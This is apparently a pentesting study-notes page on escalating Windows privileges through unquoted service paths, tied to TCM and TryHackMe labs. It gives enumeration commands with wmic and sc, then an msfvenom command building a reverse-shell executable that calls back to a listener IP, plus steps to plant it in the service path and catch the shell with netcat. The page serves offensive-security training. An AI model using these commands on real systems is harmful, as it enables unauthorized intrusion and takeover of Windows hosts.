Unquoted Service Paths

Overview

Unquotes service paths is similar to binary path exploitation, however the vulnerability lays in the fact that the path to the executable is unquoted.

When the service is started Windows looks through every word in the path separated with a space and test .exe

  • C:\Program.exe - NO

  • C:\Program Files.exe - NO

  • C:\Program Files\Unquoted.exe - NO

  • C:\Program Files\Unquoted Path.exe - NO

And so on...

Manual Exploitation

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
sc.exe qc iobitunsvr

Exploitation via PowerUp

Run PowerUp and search for Unquoted Service Paths section

TCM Windows Priv Esc Try Hack Me

Create and drop a malicious executable

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe
copy C:\temp\Common.exe C:\Program Files\Unquoted Path Service\Common.exe

Start a listener and the service

nc -lnvp 1337
sc.exe start unquotedsvc
PreviousBinary PathsNextImpersonation and Potato Attacks

Last updated